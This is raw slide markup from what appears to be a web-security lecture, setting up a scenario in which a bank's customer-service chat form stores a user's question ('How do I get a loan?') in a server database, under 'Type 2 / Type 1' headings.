          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 41"/>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42" name="object 42"/>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3" name="object 43"/>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44" name="object 44"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>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245717"/>
            <a:ext cx="3605107" cy="3371427"/>
            <a:chOff x="6209088" y="934288"/>
            <a:chExt cx="2703830" cy="252857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052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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3" name="object 13"/>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14" name="object 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="30303"/>
            <a:ext cx="6361007" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5533675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>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18" name="object 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>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1" name="object 21"/>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22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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25" name="object 25"/>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26" name="object 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>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9" name="object 29"/>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0" name="object 30"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>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32" name="object 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7679428" y="1348739"/>
              <a:ext cx="373374" cy="443478"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7725854" y="1372057"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 35"/>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36" name="object 36"/>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37" name="object 37"/>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38" name="object 38"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612717" y="815171"/>
            <a:ext cx="6147647" cy="672706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-460" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>customer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>associate.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740682" y="5752200"/>
            <a:ext cx="3364653" cy="1079783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="6773" algn="r">
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>awn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>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40" name="object 40"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520"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41" name="object 41"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9667242"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245717"/>
            <a:ext cx="3605107" cy="3371427"/>
            <a:chOff x="6209088" y="934288"/>
            <a:chExt cx="2703830" cy="252857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052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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grpSp>
        <p:nvGrpSpPr>
